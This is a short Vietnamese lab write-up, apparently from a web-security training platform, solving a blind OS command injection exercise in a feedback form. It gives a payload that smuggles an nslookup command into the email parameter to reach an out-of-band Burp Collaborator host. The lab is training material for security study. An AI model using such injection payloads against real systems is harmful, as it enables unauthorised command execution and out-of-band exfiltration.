Lab: Blind OS command injection with out-of-band interaction

Mô tả

Phòng thí nghiệm chứa lỗ hổng blind OS command injection trong chức năng feedback

Ứng dụng thực thi lệnh shell chứa thông tin chi tiết do người dùng cung cấp. Đầu ra từ lệnh không được trả về trong phản hồi. Không thể chuyển hướng đầu ra vào vị trí mà bạn có thể truy cập. Tuy nhiên, bạn có thể kích hoạt tương tác ngoài băng tần với miền bên ngoài.

Mục tiêu: Khai thác lỗ hổng blind OS command injection để thực hiện DNS lookup tới Burp Collaborator.

Giải pháp

Chỉnh sửa tham số email

email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

Nhấp chuột phải và chọn "Insert Collaborator payload" để chèn Burp Collaborator subdomain vào vị trí được chỉ định trong tham số email